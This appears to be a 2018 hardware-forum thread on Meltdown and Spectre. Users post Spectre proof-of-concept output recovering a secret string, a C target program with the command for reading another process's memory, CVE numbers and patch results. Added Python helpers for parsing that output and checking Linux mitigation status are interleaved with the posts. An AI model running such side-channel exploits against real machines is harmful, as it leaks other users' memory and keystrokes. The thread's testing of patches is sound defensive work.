[DISCUSSION] Meltdown and Spectre

Discussion in 'PC Hardware' started by scaramonga, Jan 3, 2018.

  1. VDev

    VDev MDL Member

    Sep 9, 2015
    109
    57
    10
    On ubuntu 16.04.3 with linux kernel 4.13.25
    Reading 40 bytes:
    Reading at malicious_x = 0xffffffffffdfed08... Success: 0x54='T' score=2
    Reading at malicious_x = 0xffffffffffdfed09... Unclear: 0x68='h' score=999 (second best: 0x01 score=763)
    Reading at malicious_x = 0xffffffffffdfed0a... Unclear: 0x65='e' score=999 (second best: 0x01 score=799)
    Reading at malicious_x = 0xffffffffffdfed0b... Unclear: 0x20=' ' score=999 (second best: 0x01 score=660)
    Reading at malicious_x = 0xffffffffffdfed0c... Unclear: 0x4D='M' score=999 (second best: 0x01 score=779)
    Reading at malicious_x = 0xffffffffffdfed0d... Unclear: 0x61='a' score=999 (second best: 0x01 score=790)
    Reading at malicious_x = 0xffffffffffdfed0e... Unclear: 0x67='g' score=999 (second best: 0x01 score=765)
    Reading at malicious_x = 0xffffffffffdfed0f... Unclear: 0x69='i' score=999 (second best: 0x01 score=796)
    Reading at malicious_x = 0xffffffffffdfed10... Unclear: 0x63='c' score=999 (second best: 0x01 score=799)
    Reading at malicious_x = 0xffffffffffdfed11... Unclear: 0x20=' ' score=999 (second best: 0x01 score=772)
    Reading at malicious_x = 0xffffffffffdfed12... Unclear: 0x57='W' score=999 (second best: 0x01 score=782)
    Reading at malicious_x = 0xffffffffffdfed13... Unclear: 0x6F='o' score=999 (second best: 0x01 score=836)
    Reading at malicious_x = 0xffffffffffdfed14... Unclear: 0x72='r' score=999 (second best: 0x01 score=782)
    Reading at malicious_x = 0xffffffffffdfed15... Unclear: 0x64='d' score=999 (second best: 0x01 score=826)
    Reading at malicious_x = 0xffffffffffdfed16... Unclear: 0x73='s' score=999 (second best: 0x01 score=759)
    Reading at malicious_x = 0xffffffffffdfed17... Unclear: 0x20=' ' score=999 (second best: 0x01 score=799)
    Reading at malicious_x = 0xffffffffffdfed18... Unclear: 0x61='a' score=999 (second best: 0x01 score=796)
    Reading at malicious_x = 0xffffffffffdfed19... Unclear: 0x72='r' score=999 (second best: 0x01 score=804)
    Reading at malicious_x = 0xffffffffffdfed1a... Unclear: 0x65='e' score=999 (second best: 0x01 score=812)
    Reading at malicious_x = 0xffffffffffdfed1b... Unclear: 0x20=' ' score=999 (second best: 0x01 score=812)
    Reading at malicious_x = 0xffffffffffdfed1c... Unclear: 0x53='S' score=999 (second best: 0x01 score=806)
    Reading at malicious_x = 0xffffffffffdfed1d... Unclear: 0x71='q' score=999 (second best: 0x01 score=784)
    Reading at malicious_x = 0xffffffffffdfed1e... Unclear: 0x75='u' score=999 (second best: 0x01 score=782)
    Reading at malicious_x = 0xffffffffffdfed1f... Unclear: 0x65='e' score=999 (second best: 0x01 score=781)
    Reading at malicious_x = 0xffffffffffdfed20... Unclear: 0x61='a' score=999 (second best: 0x01 score=770)
    Reading at malicious_x = 0xffffffffffdfed21... Unclear: 0x6D='m' score=999 (second best: 0x01 score=781)
    Reading at malicious_x = 0xffffffffffdfed22... Unclear: 0x69='i' score=999 (second best: 0x01 score=809)
    Reading at malicious_x = 0xffffffffffdfed23... Unclear: 0x73='s' score=999 (second best: 0x01 score=788)
    Reading at malicious_x = 0xffffffffffdfed24... Unclear: 0x68='h' score=999 (second best: 0x01 score=780)
    Reading at malicious_x = 0xffffffffffdfed25... Unclear: 0x20=' ' score=999 (second best: 0x01 score=775)
    Reading at malicious_x = 0xffffffffffdfed26... Unclear: 0x4F='O' score=999 (second best: 0x01 score=775)
    Reading at malicious_x = 0xffffffffffdfed27... Unclear: 0x73='s' score=999 (second best: 0x01 score=788)
    Reading at malicious_x = 0xffffffffffdfed28... Unclear: 0x73='s' score=999 (second best: 0x01 score=801)
    Reading at malicious_x = 0xffffffffffdfed29... Unclear: 0x69='i' score=999 (second best: 0x01 score=828)
    Reading at malicious_x = 0xffffffffffdfed2a... Unclear: 0x66='f' score=999 (second best: 0x01 score=782)
    Reading at malicious_x = 0xffffffffffdfed2b... Unclear: 0x72='r' score=999 (second best: 0x01 score=800)
    Reading at malicious_x = 0xffffffffffdfed2c... Unclear: 0x61='a' score=999 (second best: 0x01 score=791)
    Reading at malicious_x = 0xffffffffffdfed2d... Unclear: 0x67='g' score=999 (second best: 0x01 score=802)
    Reading at malicious_x = 0xffffffffffdfed2e... Unclear: 0x65='e' score=999 (second best: 0x01 score=810)
    Reading at malicious_x = 0xffffffffffdfed2f... Unclear: 0x2E='.' score=999 (second best: 0x01 score=765)

    Original: The Magic Words are Squeamish Ossifrage.
    Recovered: The Magic Words are Squeamish Ossifrage.

    The output code could be refined further: upon seeing an Unclear result, mark it as ?
    If I get this right, the deciphered text will be T?????????????????
    The Linux patch is working, but Windows didn't get it right.
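    To make the "?" marking suggested above concrete, here is an added Python post-processor (not part of the post or of the PoC itself) that parses these output lines and rebuilds the recovered string. The sample lines are the first four from the output quoted above; the optional margin rule, which accepts an Unclear guess only when it beats the runner-up by a given number of points, is my own addition.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: the first four output lines quoted in the post above.
SAMPLE_OUTPUT = """\
Reading at malicious_x = 0xffffffffffdfed08... Success: 0x54='T' score=2
Reading at malicious_x = 0xffffffffffdfed09... Unclear: 0x68='h' score=999 (second best: 0x01 score=763)
Reading at malicious_x = 0xffffffffffdfed0a... Unclear: 0x65='e' score=999 (second best: 0x01 score=799)
Reading at malicious_x = 0xffffffffffdfed0b... Unclear: 0x20=' ' score=999 (second best: 0x01 score=660)
"""

LINE_RE = re.compile(
    r"Reading at malicious_x = (?P<addr>0x[0-9a-fA-F]+)\.\.\. "
    r"(?P<status>Success|Unclear): (?P<byte>0x[0-9a-fA-F]{2})='(?P<ch>.)' score=(?P<score>\d+)"
    r"(?: \(second best: (?P<byte2>0x[0-9a-fA-F]{2}) score=(?P<score2>\d+)\))?"
)

@dataclass
class Guess:
    addr: int
    byte: int
    status: str
    score: int
    second_byte: Optional[int]
    second_score: Optional[int]

def parse_output(text: str) -> List[Guess]:
    """One Guess per matching line; unrelated lines (e.g. 'Reading 40 bytes:') are skipped."""
    guesses = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            guesses.append(Guess(
                int(m["addr"], 16), int(m["byte"], 16), m["status"], int(m["score"]),
                int(m["byte2"], 16) if m["byte2"] else None,
                int(m["score2"]) if m["score2"] else None))
    return guesses

def render(guesses: List[Guess], min_margin: Optional[int] = None) -> str:
    """Rebuild the recovered text. Unclear bytes become '?' unless min_margin is given
    and the best guess beats the runner-up by at least that many points (my own rule)."""
    out = []
    for g in guesses:
        accept = g.status == "Success"
        if not accept and min_margin is not None and g.second_score is not None:
            accept = g.score - g.second_score >= min_margin
        out.append(chr(g.byte) if accept and 32 <= g.byte < 127 else "?")
    return "".join(out)
```

    With the strict rule the sample renders as "T???", which is exactly the "T????..." the post predicts; with min_margin=100 all four sample bytes are accepted.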
     
  2. Mikorist

    Mikorist MDL Member

    Dec 26, 2012
    205
    144
    10
    #162 Mikorist, Jan 11, 2018
    Last edited: Jan 11, 2018
    Depends. This is a very complicated mess.

    This is a case-by-case diagnostic.

    You can fool Spectre on some computer hardware.

    On AMD you can disable the eBPF JIT in order to prevent attacks on the kernel address space.

    But Spectre can be inter-application (not necessarily targeting the kernel directly).

    Spectre attacks address the core flaw in processor design.

    You can read from other applications, not only from your own memory.

    For example, create a simple program (from GitHub):

    Code:
    #include <stdio.h>
    #include <stdint.h>
    #include <stdlib.h>

    int main(int argc, const char **argv) {
      uint8_t *ptr;

      (void)argc; (void)argv; // unused

      ptr = (uint8_t *)malloc(2 * sizeof(uint8_t)); // allocate two bytes (the original allocated one but wrote two)
      if (ptr == NULL) return 1;
      ptr[0] = 65; // 'A'
      ptr[1] = 66; // 'B'

      printf("%d %d - %p\n", ptr[0], ptr[1], (void *)ptr); // print bytes and pointer
      fflush(stdout); // make sure the address is shown before we block
      getchar(); // wait for console input so the bytes stay in memory
      free(ptr);
      return 0;
    }
    Run the test program:

    ./test
    65 66 - 0x1a7c010

    Run spectre with args in another console:

    # ./spectre 0x1a7c010 2

    In this way it is able to read, in real time, any character entered on the keyboard.

    Programmers can make portable applications for hacking every computer, because the flaw in processor design allows this.....

    And the size of these malicious applications: not more than 20kb. Like a virus...

    I'm not particularly good at predictions. But I can not really see anything good to happen from this flaw o_O
     
  3. Joe C

    Joe C MDL Guru

    Jan 12, 2012
    3,522
    2,093
    120
  4. 3zero3

    3zero3 MDL Senior Member

    Apr 26, 2012
    421
    685
    10
    I saw Intel® Pentium® Processor 75 MHz, 50 MHz FSB

    But the release note inside the archive microcode-20180108.tgz says:

    No Sandy Bridge and earlier.
     
  5. Mikorist

    Mikorist MDL Member

    Dec 26, 2012
    205
    144
    10
    #165 Mikorist, Jan 11, 2018
    Last edited: Jan 11, 2018
  6. Mikorist

    Mikorist MDL Member

    Dec 26, 2012
    205
    144
    10
    #166 Mikorist, Jan 11, 2018
    Last edited: Jan 11, 2018
  7. Mikorist

    Mikorist MDL Member

    Dec 26, 2012
    205
    144
    10
  8. Daz

    Daz MDL Developer / Admin
    Staff Member

    Jul 31, 2009
    9,534
    67,251
    300
    I've posted updated code. Compile it however you want. I can't find a consistent way to get it working on all hardware.

    You might find that the "faster" version gives a better result on older hardware. I can only guess that the compiler is to blame, as the version using a little assembly works perfectly on Linux.
     
  9. Mikorist

    Mikorist MDL Member

    Dec 26, 2012
    205
    144
    10
  10. Netbanshee

    Netbanshee MDL Junior Member

    Dec 26, 2009
    80
    17
    0
    How much does this Intel flaw affect US security? Net security? Think about it.
     
  11. Daz

    Daz MDL Developer / Admin
    Staff Member

    Jul 31, 2009
    9,534
    67,251
    300
    CVE-2017-5753 (bounds check bypass)
    CVE-2017-5715 (branch target injection)

    Both get patched, but software also needs to be updated to mitigate Spectre.
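    As an added check (not from this thread), Linux kernels since 4.15 (and stable backports) report the kernel-side mitigation state for the two Spectre variants named above and for Meltdown under /sys/devices/system/cpu/vulnerabilities; this Python reads those files and lists what still needs attention. The directory path and the three entry names are real; the sample values written by make_sample_dir are constructed stand-ins for testing offline.

```python
import os
import tempfile
from typing import Dict, List

# Real sysfs directory exposed by Linux kernels since 4.15 (and stable backports).
VULN_DIR = "/sys/devices/system/cpu/vulnerabilities"
# Entries for the two Spectre variants named above plus Meltdown.
ENTRIES = ("spectre_v1", "spectre_v2", "meltdown")

def read_status(vuln_dir: str = VULN_DIR) -> Dict[str, str]:
    """Return the raw one-line status string per entry; a missing file means an old kernel."""
    status = {}
    for name in ENTRIES:
        try:
            with open(os.path.join(vuln_dir, name)) as f:
                status[name] = f.read().strip()
        except OSError:
            status[name] = "unknown"
    return status

def classify(value: str) -> str:
    """Map the kernel's wording to ok / mitigated / vulnerable / unknown."""
    if value.startswith("Not affected"):
        return "ok"
    if value.startswith("Mitigation:"):
        return "mitigated"
    if value.startswith("Vulnerable"):
        return "vulnerable"
    return "unknown"

def needs_attention(vuln_dir: str = VULN_DIR) -> List[str]:
    """Entries that are still Vulnerable or could not be read at all."""
    return [n for n, v in read_status(vuln_dir).items()
            if classify(v) in ("vulnerable", "unknown")]

def make_sample_dir() -> str:
    """Constructed stand-in for the sysfs directory: patched for v1 and Meltdown,
    but a kernel whose spectre_v2 entry still reports Vulnerable."""
    d = tempfile.mkdtemp()
    sample = {
        "spectre_v1": "Mitigation: __user pointer sanitization",
        "spectre_v2": "Vulnerable: Minimal generic ASM retpoline",
        "meltdown": "Mitigation: PTI",
    }
    for name, value in sample.items():
        with open(os.path.join(d, name), "w") as f:
            f.write(value + "\n")
    return d
```

    Calling needs_attention() with no argument reads the live sysfs directory; an entry reported "unknown" on a kernel that should have it is itself a sign the kernel predates the patches.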
     
  12. Tiger-1

    Tiger-1 MDL Guru

    Oct 18, 2014
    7,897
    10,733
    240
    Yep, you made my day, dude. Congrats for very true words :good3:
     
  13. Tiger-1

    Tiger-1 MDL Guru

    Oct 18, 2014
    7,897
    10,733
    240
    Hehe, if so, wait for the "new" VIA CPUs, bro :p:schmorch:
     
  14. Mikorist

    Mikorist MDL Member

    Dec 26, 2012
    205
    144
    10
    #175 Mikorist, Jan 12, 2018
    Last edited: Jan 12, 2018
  15. Tiger-1

    Tiger-1 MDL Guru

    Oct 18, 2014
    7,897
    10,733
    240
    Hmm, after reading all pages of this thread I can conclude that nowadays these are the only infallible/reliable/secure devices, I think ;)
     

  16. SAM-R

    SAM-R MDL Guru

    Mar 21, 2015
    5,801
    5,573
    180
  17. Mikorist

    Mikorist MDL Member

    Dec 26, 2012
    205
    144
    10
    The first edition you did was working perfectly. :p

    New faster:

    Recovered: ?h? Magi? ??rd? ar? S?ue?m?sh ??s??r??e?

    New slower:

    Recovered: ????????????????????????????????????????

    macOS
     
  18. s1ave77

    s1ave77 Has left at his own request

    Aug 15, 2012
    16,104
    24,378
    340
    Same here on Windows. Thought I had made some mistake while compiling.
     
  19. Michaela Joy

    Michaela Joy MDL Crazy Lady

    Jul 26, 2012
    4,071
    4,651
    150